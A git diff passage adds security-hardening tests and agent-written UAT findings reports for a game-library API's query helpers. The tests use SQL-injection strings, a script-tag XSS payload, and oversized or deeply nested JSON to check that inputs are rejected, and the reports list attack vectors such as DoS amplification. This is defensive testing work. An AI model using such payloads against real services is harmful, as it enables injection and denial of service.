+        from orchestrator.api._query_helpers import QueryParamError, build_where_clause
+
+        with pytest.raises(QueryParamError, match=r"unknown operator|not allowed"):
+            build_where_clause(
+                {"size_bytes": {"bogus_op": 100}},
+                allow_list=_games_allow_list(),
+            )
+
+
+# ---------------------------------------------------------------------------
+# S3-d + S3-e: metadata JSON parse hardening
+# ---------------------------------------------------------------------------
+
+
+class TestS3deMetadataParseHardening:
+    async def test_oversized_metadata_returns_null(self, client, populated_pool):
+        """S3-e: metadata > MAX_METADATA_BYTES short-circuits to null
+        without invoking json.loads (defense against billion-laughs etc.)."""
+        # Update one game's metadata to a giant string
+        async with populated_pool.write_transaction() as tx:
+            big_meta = '{"x":"' + ("y" * 200_000) + '"}'
+            await tx.execute("UPDATE games SET metadata = ? WHERE id = 1", (big_meta,))
+        r = await client.get(
+            "/api/v1/games?limit=500",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        game = next(g for g in r.json()["games"] if g["id"] == 1)
+        # Spec: parse-fail path returns null
+        assert game["metadata"] is None
+
+    async def test_deeply_nested_metadata_returns_null(self, client, populated_pool):
+        """S3-d: deeply-nested JSON that triggers RecursionError on parse
+        is caught and returns null, not 500."""
+        # 2000 levels of nesting — python's default recursion limit is 1000
+        deep = "[" * 2000 + "1" + "]" * 2000
+        async with populated_pool.write_transaction() as tx:
+            await tx.execute("UPDATE games SET metadata = ? WHERE id = 1", (deep,))
+        r = await client.get(
+            "/api/v1/games?limit=500",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        # Must not 500
+        assert r.status_code == 200
+        game = next(g for g in r.json()["games"] if g["id"] == 1)
+        assert game["metadata"] is None
+
+
+# ---------------------------------------------------------------------------
+# S3-h: FilterAllowList rejects non-identifier field names
+# ---------------------------------------------------------------------------
+
+
+class TestS3hFilterAllowListIdentifierCheck:
+    def test_invalid_identifier_rejected(self):
+        from orchestrator.api._query_helpers import FilterAllowList, FilterFieldSpec
+
+        # Field name with SQL syntax: must reject at construction
+        with pytest.raises(ValueError, match=r"invalid identifier|must match"):
+            FilterAllowList({"1=1 OR x": FilterFieldSpec(ops={"eq"}, value_type=str)})
+
+    def test_valid_identifiers_accepted(self):
+        from orchestrator.api._query_helpers import FilterAllowList, FilterFieldSpec
+
+        # Standard SQL identifiers must work
+        allow = FilterAllowList(
+            {
+                "platform": FilterFieldSpec(ops={"eq"}, value_type=str),
+                "size_bytes": FilterFieldSpec(ops={"gte"}, value_type=int),
+                "last_prefilled_at": FilterFieldSpec(ops={"gte"}, value_type=str),
+            }
+        )
+        assert "platform" in allow.by_field
+
+    def test_reserved_param_name_rejected(self):
+        """S3-j: a field named `limit`/`offset`/`sort` is unreachable
+        because the parser reserves those names. Must reject at construction."""
+        from orchestrator.api._query_helpers import FilterAllowList, FilterFieldSpec
+
+        for reserved in ("limit", "offset", "sort"):
+            with pytest.raises(ValueError, match=r"reserved|cannot use"):
+                FilterAllowList({reserved: FilterFieldSpec(ops={"eq"}, value_type=str)})
+
+
+# ---------------------------------------------------------------------------
+# S3-i: SortField/SortAllowList identifier validator
+# ---------------------------------------------------------------------------
+
+
+class TestS3iSortAllowListIdentifierCheck:
+    def test_invalid_identifier_rejected(self):
+        from orchestrator.api._query_helpers import SortAllowList
+
+        with pytest.raises(ValueError, match=r"invalid identifier|must match"):
+            SortAllowList(fields={"id; DROP TABLE games;"})
+
+
+# ---------------------------------------------------------------------------
+# S3-a: string-typed filter value content validation (timestamp format)
+# ---------------------------------------------------------------------------
+
+
+class TestS3aStringFilterValueValidation:
+    """Note: this is a partial fix in scope. The full fix would add per-field
+    validators (timestamp ISO format, etc.). For BL7's allow-list:
+    - platform: enum (steam, epic) — validated by DB CHECK constraint downstream
+    - status: enum (8 values) — same
+    - last_prefilled_at / last_validated_at: ISO 8601 timestamps
+
+    For UAT-4 we add basic ISO-format validation on timestamp fields.
+    XSS-payload values to non-timestamp string fields would still pass through
+    but never reach a render context (the orchestrator is the server; XSS is
+    a downstream Game_shelf concern). Pin the timestamp validation here."""
+
+    def test_timestamp_field_accepts_iso_8601(self):
+        from orchestrator.api._query_helpers import parse_filters
+
+        result = parse_filters(
+            QueryParams("last_prefilled_at_gte=2026-05-01T00:00:00Z"),
+            allow_list=_games_allow_list(),
+        )
+        assert result["last_prefilled_at"]["gte"] == "2026-05-01T00:00:00Z"
+
+    def test_timestamp_field_accepts_date_only(self):
+        from orchestrator.api._query_helpers import parse_filters
+
+        # Date-only format also valid for SQLite text comparison
+        result = parse_filters(
+            QueryParams("last_prefilled_at_gte=2026-05-01"),
+            allow_list=_games_allow_list(),
+        )
+        assert result["last_prefilled_at"]["gte"] == "2026-05-01"
+
+    def test_timestamp_field_rejects_xss_payload(self):
+        from orchestrator.api._query_helpers import QueryParamError, parse_filters
+
+        with pytest.raises(QueryParamError, match=r"invalid|timestamp|format"):
+            parse_filters(
+                QueryParams("last_prefilled_at_gte=<script>alert(1)</script>"),
+                allow_list=_games_allow_list(),
+            )
+
+
+# ---------------------------------------------------------------------------
+# Helpers (mirror the games allow-list from BL7)
+# ---------------------------------------------------------------------------
+
+
+def _games_allow_list():
+    from orchestrator.api._query_helpers import FilterAllowList, FilterFieldSpec
+
+    return FilterAllowList(
+        {
+            "platform": FilterFieldSpec(ops={"eq", "in"}, value_type=str),
+            "status": FilterFieldSpec(ops={"eq", "in"}, value_type=str),
+            "owned": FilterFieldSpec(ops={"eq"}, value_type=int),
+            "size_bytes": FilterFieldSpec(ops={"eq", "gte", "lte"}, value_type=int),
+            "last_prefilled_at": FilterFieldSpec(ops={"gte", "lte"}, value_type="timestamp"),
+            "last_validated_at": FilterFieldSpec(ops={"gte", "lte"}, value_type="timestamp"),
+        }
+    )
+
+
+def _games_sort_allow_list():
+    from orchestrator.api._query_helpers import SortAllowList
+
+    return SortAllowList(
+        fields={"id", "title", "status", "size_bytes", "last_prefilled_at", "last_validated_at"}
+    )

--- a/tests/uat/sessions/2026-05-20-session-4/agent-results/_consolidated.md
+++ b/tests/uat/sessions/2026-05-20-session-4/agent-results/_consolidated.md
@@ -1,0 +1,122 @@
+# UAT-4 Consolidated Findings & Triage Matrix
+
+**Date:** 2026-05-20
+**Branch:** `feat/uat-4-session`
+**Scope:** BL6 (`/platforms`) + BL7 (`/games` + shared `_query_helpers.py`) on the BL5+UAT-3 substrate
+**Agents:** sast-middleware, input-validation, sql-injection, threat-model, perf-correctness
+
+## Tooling sweep (all clean)
+
+| Tool | Result |
+|---|---|
+| ruff check | 0 |
+| ruff format --check | 0 |
+| mypy --strict | 0 |
+| semgrep p/owasp-top-ten | 0/152 |
+| gitleaks (123 commits) | 0 |
+
+## Severity tally (cross-agent deduplicated)
+
+- **SEV-1:** 0
+- **SEV-2:** 4 unique
+- **SEV-3:** 10 unique
+- **SEV-4:** 7 unique
+
+## SEV-2 unique findings (load-bearing for next BL)
+
+| # | Title | Source agent(s) | Live? | Live exploit? |
+|---|---|---|---|---|
+| **S2-A** | `applied_filters` echo emits all 7 operator keys (6 null) per filtered field — contract drift vs spec §3.2 | perf-correctness | LIVE | API contract bug; locks the wrong convention for every future paginated endpoint |
+| **S2-B** | `?sort=,,,` silently drops the default sort. Empty entries from comma-split skip validation; only the tie-breaker survives | input-validation | LIVE | Operator typo → unintended ordering with no error signal |
+| **S2-C** | `_in=` operator has no cardinality cap. Bearer-authed attacker can amplify with 1000+ values → SQLite variable-limit error → log volume | sast-middleware + sql-injection | LIVE | DoS amplification (bearer required, so insider only) |
+| **S2-D** | Oversized integers (`?size_bytes_gte=` + 25 nines) pass validation, bind to SQLite, raise OverflowError → 500 instead of 400 | input-validation | LIVE | Bug, but limited blast radius (500 with structured log) |
+
+## SEV-3 unique findings
+
+| # | Title | Source |
+|---|---|---|
+| S3-a | `_query_helpers._coerce_value` doesn't validate string-typed values; `last_prefilled_at_gte=<script>...` round-trips into echo verbatim | sast |
+| S3-b | `build_order_by_clause` lacks defensive re-validation that `build_where_clause` has — caller-trust gap for the shared module | sast |
+| S3-c | `build_where_clause` raises `KeyError`→500 instead of `QueryParamError`→400 on unknown ops | sast |
+| S3-d | `metadata` JSON parse can hit `RecursionError` on deeply-nested input — uncaught → 500 | threat-model |
+| S3-e | No size cap on `metadata` raw bytes before `json.loads` — 1 MB blob × limit=500 = real cost | threat-model + perf |
+| S3-f | Spec §4.3's `idx_games_last_prefilled` claim is wrong — partial index isn't used for unqualified ORDER BY; planner does TEMP B-TREE SORT | perf-correctness |
+| S3-g | COUNT(*) and SELECT use separate reader-connections + WAL snapshots → `total` can disagree with rows under concurrent writes | perf-correctness |
+| S3-h | `FilterAllowList` accepts arbitrary keys — no identifier-regex check on construction. Defensive recheck in `build_where_clause` is cosmetic until this is fixed | sql-injection |
+| S3-i | `SortField` dataclass has no validator on `field`. Future endpoint authors who hand-build SortFields can inject | sql-injection |
+| S3-j | Reserved param namespace (`limit`/`offset`/`sort`) silently swallows colliding field names — future endpoint declaring a field with these names has unreachable filter | input-validation |
+
+## SEV-4 (compact)
+
+- Empty `_in` (`?status_in=`) produces silent empty-list filter (S4-a)
+- Duplicate filter keys (`?status=a&status=b`) — last wins, no warning (S4-b)
+- Trailing-comma `_in` produces empty-string value silently (S4-c)
+- `applied_filters` + `total` is a binary-search aggregate oracle (currently dominated by direct list read; meaningful if a future read-aggregate-only token is introduced) (S4-d)
+- Field literally named `foo_gte` is unaddressable as eq — operator-suffix-in-field-name silently locks naming policy (S4-e)
+- OpenAPI schema generation correctness check pending — Pydantic `alias="in"` rendering verified ok, but worth empirical check (S4-f)
+- Test coverage gaps: cross-combination tests (filter + sort + pagination + echo assertion), `applied_sort` order stability across runs (S4-g)
+
+## New threat candidates (beyond TM-001..TM-023)
+
+- **TM-024**: schema enumeration via 400 error messages (`?password=foo` vs `?platform=foo` differential) — verified by threat-model agent
+- **TM-025**: applied_filters echo as XSS amplifier if downstream client (Game_shelf) renders unsafely (integration concern, not orchestrator-side)
+- **TM-026**: aggregate oracle via `meta.total` × filter probes
+- **TM-027**: large-`_in` DoS amplification (covered by S2-C fix)
+- **TM-028**: metadata JSON depth/size DoS (covered by S3-d/S3-e fix)
+
+## Most surprising findings
+
+1. **`applied_filters` echo serializes wrong (S2-A).** Pydantic `FilterCriterion` model has all 7 op fields; with default values `None`, model_dump emits all of them. The spec example showed compact `{"eq": "steam"}` but the actual wire format is `{"eq": "steam", "in": null, "gte": null, ...}`. The test suite never asserted on the exact dict shape — only on individual keys — so this slipped through.
+
+2. **`?sort=,,,` silently bypasses defaults (S2-B).** Because the input string is non-empty, `parse_sort` enters the user-sort branch instead of applying default; the comma-split produces empty entries; the strip+continue loop produces an empty list; then only the tie-breaker is appended. Default sort never runs.
+
+3. **Spec §4.3 index claim is empirically wrong (S3-f).** `idx_games_last_prefilled` partial index is NOT used for `?sort=last_prefilled_at:desc` without a `WHERE last_prefilled_at IS NOT NULL` clause. The "Recently Prefilled" Game_shelf panel hits a full table scan.
+
+4. **Most surprising non-finding: SQL injection.** Zero actual injection vectors. The defense-in-depth re-checks are cosmetic today (S3-h, S3-i) but the structural defense (hardcoded callers + parameterized binds) holds.
+
+## Triage matrix (Orchestrator decision needed)
+
+### SEV-2 — recommendation column
+
+| ID | Title | Rec | Effort |
+|---|---|---|---|
+| S2-A | applied_filters wire-format drift | **Fix Now** — locks convention for every future endpoint; can't be backward-broken later | small (build applied_filters as plain dict; drop FilterCriterion from serialization but keep for OpenAPI) |
+| S2-B | `?sort=,,,` silent default-bypass | **Fix Now** — correctness bug; one-line parser fix (treat empty stripped entries as error or fall through to default) | tiny |
+| S2-C | `_in=` cardinality | **Fix Now** — caps blast radius; one-line in `_coerce_value`/`parse_filters` | tiny |
+| S2-D | Oversized integer → 500 | **Fix Now** — range check at parse boundary; converts 500 → 400 | tiny |
+
+### SEV-3 — recommendation column
+
+| ID | Title | Rec |
+|---|---|---|
+| S3-a | String-value validators (timestamp ISO format etc.) | Fix Now — small, prevents XSS-via-echo class entirely |
+| S3-b | `build_order_by_clause` defensive re-check | Fix Now — symmetry with `build_where_clause`; <10 lines |
+| S3-c | `KeyError → 500` on unknown op in builder | Fix Now — symmetry with parser |
+| S3-d | metadata RecursionError uncaught | Fix Now — add to except tuple |
+| S3-e | metadata raw-bytes cap before json.loads | Fix Now — defense-in-depth before F5/F6 write hot paths |
+| S3-f | spec §4.3 index claim wrong | Doc fix — update spec; defer index creation until profiling shows real cost |
+| S3-g | COUNT/SELECT racing snapshots | Document as expected behavior in spec — single-user single-orchestrator drift is bounded |
+| S3-h | `FilterAllowList` identifier regex check | Fix Now — makes the defensive recheck real, hardens future endpoints |
+| S3-i | `SortField` field validator | Fix Now — same rationale as S3-h |
+| S3-j | Reserved param namespace collision | Fix Now — `FilterAllowList.__init__` raises if a reserved name is in the field list |
+
+### SEV-4 — defer to Phase 3 or fold into other BLs
+
+All 7 SEV-4 items are polish/coverage; defer to a Phase 3 hardening pass.
+
+## Per memory `feedback_default_to_most_capable.md`
+
+Recommend **Fix Now on all 4 SEV-2 + 8 of 10 SEV-3** (deferring S3-f as doc-only and S3-g as documented-behavior). This is the most-capable option:
+- API contract drift (S2-A) MUST be fixed before next paginated endpoint inherits
+- Other SEV-3 items are mostly defense-in-depth on the shared `_query_helpers.py` — same rationale as fixing S2-A; future endpoints will inherit whatever we ship
+- Total effort: ~6 hours of work; mostly small fixes with regression tests
+
+Single combined remediation commit on `feat/uat-4-session` per UAT-3 pattern.
+
+## File index
+
+- `sast-middleware.md` (25 KB) — tooling + middleware regression + new threat candidates
+- `threat-model.md` (29 KB) — TM-001..023 walk + 8 beyond-TM scenarios
+- `input-validation.md` (28 KB) — 7 input vector matrices
+- `sql-injection.md` (24 KB) — SQL surface deep-dive + property test proposals
+- `perf-correctness.md` (28 KB) — index utilization, race window, OpenAPI correctness

--- a/tests/uat/sessions/2026-05-20-session-4/agent-results/input-validation.md
+++ b/tests/uat/sessions/2026-05-20-session-4/agent-results/input-validation.md
@@ -1,0 +1,451 @@
+# UAT-4 Input Validation Fuzz
+**Agent:** input-validation
+**Date:** 2026-05-20
+**Scope:** `src/orchestrator/api/_query_helpers.py` + consumer `routers/games.py`
+**Method:** Code-trace fuzz against BL7 spec (no live execution against the app).
+
+The BL7 helpers lock conventions reused by every future paginated endpoint
+(`/jobs`, `/manifests`, `/stats`, `/block_list`), so any gap here is a
+multiplier across F9.
+
+---
+
+## Vector A — Filter keys with multi-underscore field names
+
+**Parser shape (lines 162–170):**
+```python
+field_name = key
+op = "eq"
+if "_" in key:
+    for candidate_op in ("gte", "lte", "gt", "lt", "ne", "in", "eq"):
+        suffix = f"_{candidate_op}"
+        if key.endswith(suffix):
+            field_name = key[: -len(suffix)]
+            op = candidate_op
+            break
+```
+
+The tuple is roughly longest-first (`gte`/`lte` are 3 chars and listed
+first); the remaining 2-char ops (`gt`, `lt`, `ne`, `in`, `eq`) are
+mutually exclusive endings, so order among them doesn't matter for
+unambiguous suffixes.
+
+| Input key | Expected | Actual | Gap? |
+|---|---|---|---|
+| `created_at_gte=...` (future field `created_at`) | field=`created_at`, op=`gte` | field=`created_at`, op=`gte` (suffix `_gte` matches first) | None |
+| `created_at_in=a,b` | field=`created_at`, op=`in` | field=`created_at`, op=`in` (suffixes `_gte`/`_lte`/`_gt`/`_lt`/`_ne` miss, `_in` matches) | None |
+| `created_at_gt=...` | field=`created_at`, op=`gt` | field=`created_at`, op=`gt` (longest-suffix avoids eating `_gte` because string doesn't end with it) | None |
+| `created_at=...` (no op) | field=`created_at`, op=`eq` | Loop sees `_at` is NOT in the suffix vocabulary so falls through; *but* `_eq` is in the vocabulary too — string doesn't end with `_eq`, so `op` stays default `eq`. field=`created_at`. | None |
+| `created_in=...` (hypothetical field `created_in` doesn't exist) | unknown filter field error referencing `created`, op=`in` | field=`created`, op=`in` → `created` not in allow_list → 400 `unknown filter field: created` | **Minor UX gap (SEV-4)** — the error message names the *stripped* field, which can confuse an operator who typed `created_in` thinking it was a field. |
+| Hypothetical field literally named `foo_gte` (no operator desired) | accessible via `?foo_gte=v` for eq | Parser strips `_gte` → field=`foo`, op=`gte` → 400 unless `foo` is also allow-listed. Field `foo_gte` is **unaddressable for eq** (any direct GET will be reinterpreted as op-suffix). User would have to use `foo_gte_eq` which strips to `foo_gte` only if `_eq` runs first — but `_gte` matches first because it's longer in the loop order, so `foo_gte_eq` → field=`foo_gte`, op=`eq` (correct because `_gte` doesn't match end of `foo_gte_eq`). | **SEV-4 design note**: documented convention in BL7 spec §4.1 doesn't call out that future endpoint authors **MUST NOT** declare a field whose name ends in any of `_eq/_in/_gte/_lte/_gt/_lt/_ne` for direct (no-suffix) access. Spec §3.1 implicitly enforces this by listing fields, but a guard in `FilterAllowList.__init__` would make it explicit. |
+| Future field `foo_gte_in` (op `in`) | field=`foo_gte`, op=`in` | `_gte` doesn't match end (key ends `_in`); `_in` matches → field=`foo_gte`, op=`in`. Works **iff** `foo_gte` is allow-listed. | None — but reinforces SEV-4 above. |
+
+**Regression test sketch:**
+```python
+def test_field_name_ending_in_op_suffix_reserved():
+    """Future field names ending in _gte/_lte/_gt/_lt/_ne/_in/_eq
+    cannot be addressed without a suffix — document or guard."""
+    # Add a paranoid validator to FilterAllowList that raises
+    # ValueError on field names with reserved suffix endings.
+```
+
+---
+
+## Vector B — Adversarial filter values
+
+| Input | Expected | Actual (per code) | Gap? |
+|---|---|---|---|
+| `?platform_in=steam,epic,a%2Cb` | 3 values (escaped comma `a,b` as one) **or** 4 values (no escape supported, documented) | Starlette URL-decodes `%2C` to `,` **before** `parse_filters` sees it; `raw_value.split(",")` yields `["steam","epic","a","b"]` — **4 values**. No comma-escape mechanism. | **SEV-3** — spec §3.1 silent on escapes. A platform identifier or status enum containing a comma cannot be sent. Acceptable for current enum-only `_in` use (status/platform), but locks the contract: every future `_in` field MUST NOT contain a comma in any legal value, OR a quoting convention must be added before that ships. Recommend: document explicitly in spec §3.1 and add a regression test asserting current behaviour. |
+| `?status_in=` (empty value) | Reject 400 OR ignore | `raw_value=""`, `"".split(",") → [""]`, coerced as `str` → `[""]` → WHERE `status IN (?)` with `[""]` → returns no rows. **Silently accepted, semantically dead.** | **SEV-3** — operator sees empty result, no error. Likely typo / link-with-trailing-equals. Fix: reject empty `_in` value in `parse_filters` (raise `QueryParamError("empty value list for ... _in")`). |
+| `?status_in=not_downloaded` (single value with `_in`) | 1-element list | `["not_downloaded"]` → `WHERE status IN (?)` → equivalent to `status=not_downloaded`. Works fine. | None |
+| `?status_in=a,b,` (trailing comma) | 2 values? Or 3 incl `""`? | `split(",") → ["a","b",""]` → 3 values, last is empty string. WHERE `status IN (?,?,?)` with `["a","b",""]`. Returns rows matching `a`, `b`, or empty-string status (none). | **SEV-3** — silent extra empty-string match. Fix: filter out empty post-strip in the `_in` comprehension, **and** raise if the post-filter list is empty. |
+| `?size_bytes_gte=00100` | 100 (coerced) | `int("00100")` → 100. Accepted. | None — Python `int()` strips leading zeros for base-10. Acceptable. |
+| `?size_bytes_gte=-1` | Accepted; query returns all rows (size ≥ -1) | Accepted; `int("-1")` → -1; valid bind. Spec §3.1 doesn't constrain negative ints for size_bytes. Returns all rows with size_bytes IS NOT NULL. | **SEV-4 design note** — negative size_bytes is nonsensical for the domain but spec doesn't forbid. Not a vulnerability, just lazy. Optional: per-field `min_value` in `FilterFieldSpec`. |
+| `?size_bytes_gte=100.5` | Reject 400 (int field, float value) | `int("100.5")` → ValueError → caught → `QueryParamError("invalid value for size_bytes_gte: '100.5'")` → 400. | None — correct. |
+| `?size_bytes_gte=9999999999999999999999999` | Reject 400 OR clamp | `int(...)` succeeds (Python big-int). Coerce returns 25-digit int. SQLite `INTEGER` is signed 64-bit; binding via `sqlite3` raises **`OverflowError: Python int too large to convert to SQLite INTEGER`** at `pool.read_one`/`read_all`. This is **NOT** a `PoolError` subclass — it will propagate as an uncaught exception unless `Pool` wraps it. | **SEV-2 (verify)** — depends on `Pool.read_one`/`read_all` exception handling. If it doesn't catch `OverflowError` and re-raise as `PoolError`, the operator sees a 500 with traceback (worst case via FastAPI default error). **Action:** verify in `src/orchestrator/db/pool.py` and either (a) catch OverflowError in pool → PoolError → 503, or (b) validate range in `_coerce_value` (preferred — proper 400 with clear message). |
+| `?platform=stéam` (unicode in str field) | Passed through to SQL params; no match | `str` path of `_coerce_value` returns raw. SQLite TEXT binds accept UTF-8. Returns no rows. No injection risk (parameterized). | None — safe. |
+
+**Regression test sketches:**
+```python
+def test_in_with_empty_value_raises():
+    with pytest.raises(QueryParamError, match="empty"):
+        parse_filters(QueryParams("status_in="), allow_list=_games_allow_list())
+
+def test_in_with_trailing_comma_rejected_or_filtered():
+    # Either drop the empty trailing entry OR raise — pick one and lock.
+    ...
+
+def test_oversized_int_returns_400_not_500():
+    # ?size_bytes_gte=99...9 (25 digits) must produce 400, not 500.
+    r = await client.get("/api/v1/games?size_bytes_gte=" + "9"*25, headers=AUTH)
+    assert r.status_code == 400
+```
+
+---
+
+## Vector C — Sort param edge cases
+
+| Input | Expected | Actual | Gap? |
+|---|---|---|---|
+| `?sort=` (empty) | Default + tie-breaker | `params.get("sort")` returns `""`, `not raw` is True → uses `default` → `[title:asc, id:asc]` | None |
+| `?sort=,,` (just commas, no fields) | Default + tie-breaker OR 400 | `raw=",,"` is truthy, so default branch is **skipped**. Loop splits to `["", "", ""]`, each stripped to `""`, `continue`. `user_sort = []`. Then tie-breaker appended → `[id:asc]` only. **Default sort is NOT applied.** | **SEV-2** — empty-after-stripping sort silently drops the default `title:asc` ordering. Result: a 50-row page comes back ordered only by `id:asc` instead of the documented `title:asc` default. This is a **silent UX correctness bug** for any client that hits a typo'd sort param. Fix: after the loop, if `user_sort` is empty (i.e., raw was non-empty but contained only commas), either apply `default` OR raise `QueryParamError("sort param empty")`. |
+| `?sort=title:` (colon, no direction) | 400 | `":" in entry` True → `direction=""` → not in `("asc","desc")` → 400 `"invalid sort direction: ''"` | None — correct, though message says `''` which is slightly cryptic. |
+| `?sort=:asc` (no field) | 400 | `field_name=""`, `direction="asc"` → `""` not in allow_list → 400 `"'' is not a sortable field"` | None — correct, message slightly cryptic. |
+| `?sort=title:asc:extra` (extra colon) | 400 | `split(":", 1)` → field=`"title"`, direction=`"asc:extra"` → `.lower()` → `"asc:extra"` → not in `("asc","desc")` → 400. | None — correct. |
+| `?sort=title:ASC` | Accepted (lowercased) | `.strip().lower() → "asc"` → accepted. | None |
+| `?sort=title&sort=size_bytes` (duplicate keys) | Documented behaviour (first wins / last wins / error) | Starlette's `params.get("sort")` returns the **first** occurrence. Second silently ignored. | **SEV-3** — silent param shadowing. Operator sending two `sort=` params gets only the first. Fix: explicitly check `len(params.getlist("sort")) <= 1` and raise on duplicate. Same applies to duplicate `limit` and `offset`. |
+| `?sort=title:asc,title:desc` (same field twice) | Documented behaviour | Both parsed; emits `ORDER BY title ASC, title DESC, id ASC` — SQL-legal but the `DESC` is a no-op (rows already ordered by ASC). | **SEV-4** — surprising behaviour, not a bug per se. Recommend: deduplicate by `field` (first occurrence wins) in `parse_sort`, OR raise on duplicate field. |
+
+**Regression test sketches:**
+```python
+def test_sort_only_commas_applies_default_or_raises():
+    """Decide and lock: ?sort=,,, must either apply default or raise — not
+    silently drop default."""
+    result = parse_sort(QueryParams("sort=,,,"), allow_list=..., default=[SortField("title","asc")], tie_breaker=SortField("id","asc"))
+    # If chosen behaviour = apply default:
+    assert result[0].field == "title"
+
+def test_duplicate_sort_params_rejected_or_first_wins_explicit():
+    # Lock behaviour and document.
+    ...
+
+def test_duplicate_sort_field_dedupes_or_raises():
+    ...
+```
+
+---
+
+## Vector D — Pagination boundaries
+
+| Input | Expected | Actual | Gap? |
+|---|---|---|---|
+| `?limit=0` | 400 | `int("0") → 0`, `limit < 1` → `QueryParamError("limit must be >= 1, got 0")`. | None — covered by `TestParsePagination::test_zero_limit_raises`. |
+| `?limit=` (empty value) | 400 (consistent with `=abc`) | `params.get("limit")` returns `""` (not None). `int("")` → ValueError → `QueryParamError`. | None — correct. |
+| `?limit=10&limit=20` (duplicate) | Documented | First wins (Starlette behaviour, same as sort). | **SEV-3** — same as duplicate sort. Silent. Fix: explicit duplicate-rejection. |
+| `?offset=99999999999` (huge offset, no overflow) | Accepted, returns empty page | `int(...)` fine, bind fine, SQLite returns 0 rows. Total still correct. | None — but no upper bound on offset means an operator can `offset=2**63-1` and still hit DB. No DoS surface because COUNT is cheap. |
+| `?offset=2**70` (above sqlite int range) | 400 OR 503 | Python `int(...)` accepts, SQLite binding will likely `OverflowError`. Same gap as oversized size_bytes. | **SEV-3** — same OverflowError → 500 risk as B above. Fix: cap offset at `2**63 - 1` in `parse_pagination`. |
+| Big request size: `?limit=500&offset=0`, then `?limit=500&offset=500` | Both succeed independently | Two stateless requests. No issue at app layer. | None |
+
+---
+
+## Vector E — Reserved param namespace collisions
+
+**Current reserved set (line 152):** `{"limit", "offset", "sort"}`.
+
+| Scenario | Expected | Actual | Gap? |
+|---|---|---|---|
+| Future field literally named `limit` | Either reject in `FilterAllowList.__init__` OR document conflict | `parse_filters` does `if key in reserved: continue` — silently skips. The field is **unreachable as a filter**. | **SEV-3 design lock** — convention is unstated. Future endpoint author declaring a field `limit` (e.g., a `block_list.limit` column) will have a silently broken filter. Fix: `FilterAllowList.__init__` raises `ValueError` if any field name is in `{limit, offset, sort}`. |
+| `applied_filters` vs `where_builder` drift | Should be identical | Both walk the same `filters` dict; `build_where_clause` does its own allow-list re-check but never silently drops a field — if an unknown field were in the dict, it raises. So the echo and the WHERE **cannot diverge** given current code. | None |
+| `parse_filters` returns op `in` for known field but `build_where_clause` doesn't have it in `_OP_SQL` | `in` is handled in a special branch, not via `_OP_SQL`, so missing-key error impossible. If a future op (e.g., `like`) is added to a `FilterFieldSpec.ops` but not to `_OP_SQL` and not to the `in` special branch, `build_where_clause` raises `KeyError` (unhandled — would 500). | **SEV-3 hardening** — `_OP_SQL` is the single source of truth for SQL emission. Add a startup-time invariant: every op in any `FilterFieldSpec.ops` must be in `_OP_SQL` or be `"in"`. Either assert in `FilterAllowList.__init__` or add a unit test that asserts the union-set invariant. |
+
+---
+
+## Vector F — Case sensitivity matrix
+
+| Input | Expected | Actual | Gap? |
+|---|---|---|---|
+| `?Platform=steam` | 400 (allow-list is case-sensitive) | `"Platform" not in allow_list.by_field` → 400 `"unknown filter field: Platform"`. | None |
+| `?size_bytes_GTE=100` | 400 (suffix case-sensitive) | `key.endswith("_gte")` is `False` (Python `endswith` is case-sensitive). No suffix matches. field=`size_bytes_GTE`, op=`eq`. `size_bytes_GTE` not in allow_list → 400 `"unknown filter field: size_bytes_GTE"`. | **SEV-4 UX** — error message says "unknown filter field" rather than hinting that the operator suffix is case-sensitive. Operator may chase the wrong fix. Recommend: detect the case-insensitive suffix match and emit a hint. |
+| `?sort=title:Asc` | Accepted (`.lower()` in code) | `direction.strip().lower() → "asc"` → accepted. | None — correct. |
+| `?sort=Title:asc` | 400 (field case-sensitive) | `"Title" not in allow_list.fields` → 400. | None — correct, same UX caveat as above. |
+
+---
+
+## Vector G — applied_filters echo round-trip
+
+| Scenario | Expected | Actual | Gap? |
+|---|---|---|---|
+| `?status_in=a,b` → echo key for IN | `"in"` (wire alias) | Router builds `crit_kwargs["in_"]=...`; `FilterCriterion` has `in_: ... = Field(alias="in")` + `populate_by_name=True`; serialized with `body.model_dump(by_alias=True)` (router line 262). Result: JSON key is `"in"`. | None — verified. |
+| `?status=foo&status_in=bar` (both eq AND in on one field) | Open: spec doesn't say | Both parsed. `result["status"] = {"eq":"foo", "in":["bar"]}` → WHERE emits `status = ? AND status IN (?)` (ANDed). Echo: `{"status":{"eq":"foo","in":["bar"]}}`. Returns rows where `status=foo AND status IN [bar]` — empty unless foo==bar. | **SEV-4 design ambiguity** — spec §3.1 says "within a field, multiple criteria AND together" so this IS the documented behaviour. Acceptable. Recommend: a router-level test asserting this explicitly, since "both ops on one field" is a footgun. |
+| No filter params → `applied_filters` | `{}` empty dict OR absent | Router builds `applied_filters: dict[str, FilterCriterion] = {}` and passes it directly. JSON serializes as `{}`. Always present (not absent). | None — consistent with envelope contract `extra="forbid"` + `applied_filters: dict[...]`. |
+| `FilterCriterion(extra="forbid")` round-trip | Any unknown op key on input → 422 | Input is server-built so never adversarial. Output `extra="forbid"` only fires if router code adds an unknown key to `crit_kwargs`. Current code only adds keys from `parse_filters` output which is allow-list-bound. Safe. | None |
+
+---
+
+## Findings (numbered)
+
+### SEV-2 — Sort with only commas silently drops default ordering
+
+**Scenario:** `GET /api/v1/games?sort=,,,` returns 50 rows ordered by `id ASC`
+only (tie-breaker), **not** by the documented default `title:asc`. The page is
+documented to be alphabetised; it isn't.
+
+**Affected code:** `_query_helpers.py:258–286` `parse_sort`. The branch
+`if not raw:` evaluates `False` for `,,,` (non-empty string), so `default` is
+skipped, but the loop yields no entries, leaving `user_sort = []`.
+
+**Fix (minimal):**
+```python
+raw = params.get("sort")
+if not raw or not raw.strip(", "):
+    user_sort = list(default)
+else:
+    user_sort = []
+    for entry in raw.split(","):
+        ...
+    if not user_sort:  # all entries were empty after strip
+        user_sort = list(default)
+```
+Or raise `QueryParamError("sort: no non-empty entries")` — loud is better.
+
+**Regression test:**
+```python
+def test_sort_only_commas_applies_default():
+    result = parse_sort(
+        QueryParams("sort=,,,"),
+        allow_list=_games_sort_allow_list(),
+        default=[SortField("title","asc")],
+        tie_breaker=SortField("id","asc"),
+    )
+    assert result == [SortField("title","asc"), SortField("id","asc")]
+```
+
+---
+
+### SEV-2 — Oversized integer in numeric filter / offset triggers 500
+
+**Scenario:** `GET /api/v1/games?size_bytes_gte=9999999999999999999999999`
